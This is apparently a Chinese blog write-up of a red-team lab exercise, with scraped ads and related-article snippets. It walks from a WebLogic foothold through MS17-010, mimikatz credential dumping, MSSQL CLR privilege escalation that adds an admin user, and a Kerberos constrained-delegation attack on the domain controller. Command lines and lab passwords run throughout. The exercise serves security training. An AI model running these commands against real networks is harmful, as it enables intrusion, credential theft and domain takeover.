关键词:
注意:
本文仅用于技术讨论与研究,对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习目的,如果列出的技术用于其他任何目标,概不负责。
靶场环境配置
网络拓扑图
整个环境共四台目标机,分别处在三层内网环境当中。
- DMZ区环境IP段为 192.168.254.1/24
DMZ区的靶机拥有两个网卡,一个用来对外提供服务,一个用来连通第二次网络。
- 第二层网络环境IP段为 10.10.20.1/24
第二层网络的靶机同样有两个网卡,一个连通第二层网络,一个连通第三层网络
- 第三层网络环境IP段为 10.10.10.1/24
第三层网络的靶机只有一张网卡,连通第三层网络,包含域控机器与域内服务器
DMZ区域的主机可以连通外网,第二层与第三层的均不能与外网连接
由于网络环境问题,192.168.254段的ip可能会有变化。
【一一帮助安全学习,所有资源获取处一一】
①网络安全学习路线
②20份渗透测试电子书
③安全攻防357页笔记
④50份安全攻防面试指南
⑤安全红队渗透工具包
⑥网络安全必备书籍
⑦100个漏洞实战案例
⑧安全大厂内部教程
靶机信息
域控:Windows Server 2008 + IIS + Exchange 2013 邮件服务。
目录还原密码:redteam!@#45
主机名:owa
域管理员:administrator:
QWEasd123
Admin12345
域内服务器 Mssql:Windows Server 2008 + SQL Server 2008 (被配置了非约束委派)
主机名:sqlserver-2008
本地管理员:Administrator:Admin12345
域账户:redteam\\sqlserver:Server12345 (被配置了约束委派)
Mssql:sa:sa
域内个人PC:Windows 7
主机名:work-7
本地管理员:john:admin!@#45
域账户:redteam\\saul:admin!@#45
单机服务器:Windows server r2 + weblogic
主机名:weblogic
本地管理员:Administrator:Admin12345
weblogic :weblogic:weblogic123(访问 http://ip:7001)
weblogic 安装目录:C:\\Oracle\\Middleware\\Oracle_Home\\user_projects>\\domains\\base_domain
重启后需要手动开启服务
其他域用户:
域服务账户:redteam\\sqlserver:Server12345 (被配置了约束委派)
邮件用户:redteam\\mail:admin!@#45
加域账户:redteam\\adduser:Add12345
redteam\\saulgoodman:Saul12345 (被配置了非约束委派)
redteam\\gu:Gu12345
redteam\\apt404:Apt12345
漏洞利用
该靶场存在很多漏洞点都可以去尝试学习或利用
- 存在 GPP 漏洞
- 存在 MS14-068
- 存在 CVE-2020-1472
- Exchange 各种漏洞都可尝试
- 可尝试非约束委派
- 可尝试约束委派
- 存在 CVE-2019-1388
- 存在 CVE-2019-0708
… 还有很多漏洞都可尝试
单机服务器
假定现在我们已经知道目标IP为:192.168.254.112
。
信息收集
首先利用NMAP对靶标进行简易的扫描
nmap -p- -Pn -T4 192.168.254.112 -A
根据扫描到的信息发现目标开放了7001端口,存在weblogic服务,
使用weblogicscan进行扫描看看是否存在漏洞,
看起来还是存在很多漏洞的。
GetShell
使用weblogic-GUI进行注入,发现是administrator权限,直接注入内存马,冰蝎上线。
域内个人PC机器
拿下了DMZ区域的机器后,除了权限维持和权限提升,对于横向渗透通常分为两个方面。
判断机器是否为多网卡机器,然后扫描其他网段,尝试发现更多存在漏洞的机器。
尽量收集机器上的敏感信息,比如敏感内部文件、账号密码本等,帮助后面快速突破防线。
由于拿下的机器已经是administrator权限,所以可以直接进行信息收集。
先查看一下进程里面是否存在杀软:
tasklist /SVC
发现为双网卡,
这里我直接上线CS,通过冰蝎上传exe后门并执行,
上线后尝试抓一下密码,dump一下hash,
导出密码hash:
hashdump
received password hashes:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ccef208c6485269c20db2cad21734fe7:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
尝试去在线平台进行解密
拿到Administrator的密码为Admin12345
查看是否在域内
net config workstation
//查看计算机名、全名、用户名、系统版本、工作站、域、登录域。
一般时间服务器为主域控制器
net time /domain
//查看域控当前时间。
机器并不在域内,由于是双网卡,这里利用fscan进行网段扫描。
上传了fscan到 C:\\windows\\temp\\ 的目录下
然后这里通过CS插件直接运行fscan,
对另一张网卡的C段进行扫描,
扫描结果如下
这里通过这个靶场我们正好来学习CS和MSF的联动。
方法一:CS移交会话到MSF
当前情况主机上线在CS上,这里我们将CS的会话交互给MSF。
首先在CS上创建一个监听器,CS的监听器分为两种类型:beacon和foreign。
beacon为CS内置监听器,,当我们在目标系统执行payload,会弹回一个beacon的shell给CS
foreign主要是提供给外部使用的一些监听器,比如想要利用CS派生一个meterpreter的shell,来进行后续的内网渗透,这时就应该使用外部监听器。
Host指向开启MSF的服务器,
MSF上面执行下面命令,
use exploit/multi/handler
//使用监听模块
set payload windows/meterpreter/reverse_http
//这个payload要跟CS设置的payload保持一致为http协议
set lhost 0.0.0.0
//不设置也行,
set lport 8888
//端口需要与cs监听器端口保持一致,因为cs的后门是反弹的8888端口。
然后运行
run
然后在CS上执行Spawn,
选择刚才添加的派生会话给MSF的监听器。
然后可以看到msf收到了shell,
执行命令出现乱码,对编码格式进行修改
chcp65001
MSF的session中输入shell获取目标主机的远程命令行shell,使用exit退出当前的shell。
如果想要退回到控制台界面,
background:把meterpreter后台挂起。
我们这里退回到meterpreter的位置,首先添加路由
run get_local_subnets
run autoroute -s 10.10.20.0/24
run autoroute -p
然后使用MSF上的ms17-010工具扫描一下。
将会话挂起,退到控制台界面
background
search ms17-010
use 3
set rhost 10.10.20.7
run
10.10.20.7机器存在ms17-010
现在可以利用exploit/windows/smb/ms17_010_eternalblue 进行攻击, 拿下该机器
search ms17-010
use 0
set payload windows/x64/meterpreter/bind_tcp
set lport 11111
set rhosts 10.10.20.7
show options
然后执行
run
我这里第一次攻击失败了,win7蓝屏了,重新尝试,成功。
输入shell进入终端
查看ip
通过ms17-010拿下win7
方法二:建立SOCKS隧道上线MSF
这里简略描述一下思路
首先在被控机器(weblogc服务所在机器)上传frp,建立SOCKS5隧道
然后使用MSF
msfconsole
setg Proxies socks5:192.168.254.xxx:xxxx //kali代理的ip和端口
setg ReverseAllowProxy true
use exploit/windows/smb/ms17-010-eternalblue
set payload windows/x64/meterpreter/bind_tcp
set rhost 10.10.20.7
run
方法一:win7执行payload上线CS
CS设置中转监听器
然后生成后门,选择刚才新建的监听器
把后门传到kali,然后在msf中使用命令上传到靶机win7上
upload beacon.exe
然后进入shell并执行
shell
beacon.exe
这里要注意,weblogic服务所在机器并没有关闭防火墙
netsh firewall show config
查看防火墙状态
netsh adfirewall set allprofiles state off
关闭防火墙
然后就可以上线了
方法二:MSF派生会话到CS
这里CS要准备一个监听器,上面新建的一个中转监听
MSf载入注入模块
首先看一下session的id
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set lport 5678
set lhost 10.10.20.12
set session 3
域内服务器Mssql
我们先回到msf上面,加载mimikatz,抓取一下密码
load mimikatz
creds_all
这里除了域用户的账号密码,还看到了域控的,继续尝试其他方式
查看网段发现新的网段,继续添加路由
run get_local_subnets
run autorouts -s 10.10.10.0/24
run autorouts -p
这个时候我们已经通过MS17-010 -> mimikatz拿到了一个域用户的账号密码,尝试查找约束委派用户
上传一个fscan上去
fscan64.exe -h 10.10.10.0/24
存在另外两个主机
使用adfind工具扫描
# 查询配置了非约束委派的主机:
AdFind.exe -h 10.10.10.8 -u saul -up admin!@#45 -b "DC=redteam,DC=red" -f "(&(samAccountType=805306369)(userAccountControl:1.2.840.113556.1.4.803:=524288))" cn distinguishedName
# 查询配置了非约束委派的用户:
AdFind.exe -h 10.10.10.8 -u saul -up admin!@#45 -b "DC=redteam,DC=red" -f "(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=524288))" cn distinguishedName
# 查询配置了约束委派的主机:
AdFind.exe -h 10.10.10.8 -u saul -up admin!@#45 -b "DC=redteam,DC=red" -f "(&(samAccountType=805306369)(msds-allowedtodelegateto=*))" cn distinguishedName msds-allowedtodelegateto
# 查询配置了约束委派的用户:
AdFind.exe -h 10.10.10.8 -u saul -up admin!@#45 -b "DC=redteam,DC=red" -f "(&(samAccountType=805306368)(msds-allowedtodelegateto=*))" cn distinguishedName msds-allowedtodelegateto
找到sqlserver的用户设置了约束委派
对10.10.10.18机器进行尝试
80 端口、1433 SQL server端口、445 SMB端口
这里通过FRP建立多层代理
windows上使用 proxifier 设置代理链
访问80页面,没什么东西或者利用点
尝试爆破SQL server密码
使用超级弱口令工具进行检查
此时拿到了SQL server的密码
随后使用ShqrpSQLTools.exe工具对xp_cmdshell调用系统命令
.\\SharpSQLTools.exe 10.10.10.18 sa sa master xp_cmdshell whoami
目前的权限是nt authority\\network service 即为普通服务权限
在MSSQL中可以使用CLR组件提权,可以参考下面文章提权
https://www.anquanke.com/post/id/250346
使用 SharpSQLTools 开启目标 clr,进行提权
SharpSQLTools.exe 10.10.10.18 sa sa master install_clr whoami
SharpSQLTools.exe 10.10.10.18 sa sa master enable_clr
SharpSQLTools.exe 10.10.10.18 sa sa master clr_efspotato whoami
提权成功
添加一个管理员权限用户,用户名为 ocean.com 密码为 qwe.123
SharpSQLTools.exe 10.10.10.18 sa sa master clr_efspotato "net user ocean.com qwe.123 /add"
加入admin组
SharpSQLTools.exe 10.10.10.18 sa sa master clr_efspotato "net localgroup administrators ocean.com /add"
查看用户
SharpSQLTools.exe 10.10.10.18 sa sa master clr_efspotato "net user"
接下来上线msf
配置代理proxychains,在/etc/proxychains.conf文件中进行修改
然后通过代理启动msf即可
或者进入msf添加代理 均可
proxychains msfconsole
使用 mssql_clr_payload 模块
use exploit/windows/mssql/mssql_clr_payload
这里生成中转上线的CS马,和上述过程一样,新建监听器,通过msf上传cs马,
使用 SharpSQLTools.exe 去执行 CS马,获取高权限用户,拿到 SQL server 主机。
域控
这里使用了约束委派拿域控,还有很多方式比如cve-2020-1472
上线CS之后拿到用户密码
通过约束委派攻击来接管域控
上传工具 kekeo,利用 kekeo 请求该用户的 TGT:
TGT_sqlserver@REDTEAM.RED_krbtgt~redteam.red@REDTEAM.RED.kirbi
kekeo.exe "tgt::ask /user:sqlserver /domain:redteam.red /password:Server12345 /ticket:administrator.kirbi"
然后使用这个TGT获取域机器的ST
kekeo.exe "tgs::s4u /tgt:TGT_sqlserver@REDTEAM.RED_krbtgt~redteam.red@REDTEAM.RED.kirbi /user:Administrator@redteam.red /service:cifs/owa.redteam.red"
使用 mimikatz 将 ST2 导入当前会话即可,运行 mimikatz 进行 ptt
mimikatz kerberos::ptt TGS_Administrator@redteam.red@REDTEAM.RED_cifs~owa.redteam.red@REDTEAM.RED.kirbi
至此,拿到域控。
总结
通过上述过程,我们对比如GPP,约束委派,SQLServer提权有了新的认知或者理解,网络安全的学习离不开实际操作,想要搞明白漏洞更是要实际去复现学习。
内网渗透记一次靶机实战(代码片段)
...b界面。浏览页面内容,提升有一些提示。【一一帮助安全学习,所有资源获取处一一】①网络安全学习路线②20份渗透测试电子书③安全攻防357页笔记④50份安全攻防面试指南⑤安全红队渗透工具包⑥网络安全必备书籍⑦... 查看详情
一次内网靶场学习记录(代码片段)
...:内网IP10.10.10.8→点击查看技术资料←1.2000多本网络安全系列电子书2.网络安全标准题库资料3.项目源码4.网络安全基础入门、Linux、web安全、攻防方面的视频5.网络安全学习路线图外网渗透端口扫描搭建好环境,对目标192.... 查看详情
记一次内网靶机实战(代码片段)
文章目录0x00边界服务器0x01一层网络0x01-01fscan内网扫描0x01-02配置frp设置socks5代理0x01-03访问内网的(10.10.135.66)0x01-04访问内网的(10.10.135.35)0x01-05访问内网的(10.10.135.190)0x02二层网络0x02-01内网扫描0 查看详情
记一次内网靶机实战(代码片段)
文章目录0x00边界服务器0x01一层网络0x01-01fscan内网扫描0x01-02配置frp设置socks5代理0x01-03访问内网的(10.10.135.66)0x01-04访问内网的(10.10.135.35)0x01-05访问内网的(10.10.135.190)0x02二层网络0x02-01内网扫描0 查看详情
记一次从web到内网的渗透(代码片段)
记一次从web到内网的渗透拓扑图环境介绍现在有三台机器,分别为target1,target2,target3,里面分别有三个flag,每个flag的分值不同,需要通过拿下一个已知IP(target1)进而向内网里面进行渗透,... 查看详情
网络安全记一次红队渗透实战项目(代码片段)
前言【一一帮助安全学习(网络安全面试题+学习路线+视频教程+工具)一一】一、信息收集信息收集非常重要,有了信息才能知道下一步该如何进行,接下来将用nmap来演示信息收集1、nmap扫描存活IP由于... 查看详情
记一次靶场实战网络安全(代码片段)
前言【一一帮助安全学习一一】①网络安全学习路线②20份渗透测试电子书③安全攻防357页笔记④50份安全攻防面试指南⑤安全红队渗透工具包⑥网络安全必备书籍⑦100个漏洞实战案例⑧安全大厂内部视频资源⑨历年CTF夺旗赛题... 查看详情
黑客笔记:记一次sql注入到内网漫游(代码片段)
...大家在了解技术原理的前提下,更好的维护个人信息安全、企业安全、国家安全。对于红队队员来说,打点之后最重要的就是横向的内网渗透了,但很多人都卡在了这一步,今天这篇文章就主要讲一讲cob 查看详情
网络安全记一次简单渗透测试实战(代码片段)
声明此渗透测试后已将所有信息移交警方,请勿用于非法用途。信息搜集首先当然是通过fofa进行bc网站的后台搜集(搜索语法大家自行探索),获得的qi牌bc站几乎都是一模一样,估计是分站。随便打开一个看... 查看详情
网络安全记一次简单渗透测试实战(代码片段)
声明此渗透测试后已将所有信息移交警方,请勿用于非法用途。信息搜集首先当然是通过fofa进行bc网站的后台搜集(搜索语法大家自行探索),获得的qi牌bc站几乎都是一模一样,估计是分站。随便打开一个看... 查看详情
网络安全实战:记一次比较完整的靶机渗透(代码片段)
0x01信息搜集nmap-sC-sV-p--A10.10.10.123-T4-oAnmap_friendzone访问80端口的http服务只发现了一个域名。0x02DNS区域传输因为我们前面扫描的时候发现了53端口是开着一个dns服务的,所以尝试使用friendzoneportal.red进行axfr,它的具体含义简... 查看详情
记一次网络安全渗透测试实战指南(代码片段)
1.信息收集网址已无法访问,就不贴了可以使用Fofa,火线,zoomeye,searchcode.com等爬取相关的资产,重点关注一些有漏洞暴露的框架和服务例如:泛微,PHP,Tomca,后台,weblogic等等。之后就主... 查看详情
记一次简单的渗透测试(代码片段)
前言之前对渗透这方面的学习一直只是学到了Getshell为止,但是其实渗透可以说Getshell仅仅是一个开端,接下去的还有远程连接,域渗透等领域,这次刚好渗透到了某网站,决定以该网站为例,看看能不能... 查看详情
网络安全学习:内网渗透案例,打破渗透瓶颈(代码片段)
前言这又是一个关于域内基础概念与原理的系列ActiveDirectory的查询基础语法BaseDNBaseDN即基础可分辨名称,其指定了这棵树的根。比如指定BaseDN为DC=whoamianony,DC=org就是以DC=whoamianony,DC=org为根往下搜索,类似于在... 查看详情
内网渗透横向攻击流程(代码片段)
...上网)目的通过KaliLinux拿到域控权限2021最新整理网络安全\\渗透测试/安全学习(全套视频、大厂面经、精品手册、必备工具包) 查看详情
记一次若依后台管理系统渗透(代码片段)
...册 ⑦最新网安大厂面试题合集(含答案) ⑧APP客户端安全检测指南(安卓+IOS)文章地址:https://blog.csdn.net/FY10033/article/details/126206890然后坑来了 查看详情
记一次靶场实战网络安全(代码片段)
前言【一一帮助安全学习一一】①网络安全学习路线②20份渗透测试电子书③安全攻防357页笔记④50份安全攻防面试指南⑤安全红队渗透工具包⑥网络安全必备书籍⑦100个漏洞实战案例⑧安全大厂内部视频资源⑨历年CTF夺旗赛题... 查看详情
网络安全记一次代码审计(代码片段)
前言在挖掘漏洞过程中,可能有很多种方式,比如:纯白盒的代码审计、纯黑盒的渗透测试、对比补丁包寻找漏洞点等方式。这里为大家分享一种思路,灰盒(黑白盒结合)的代码审计。这种方式相较于传... 查看详情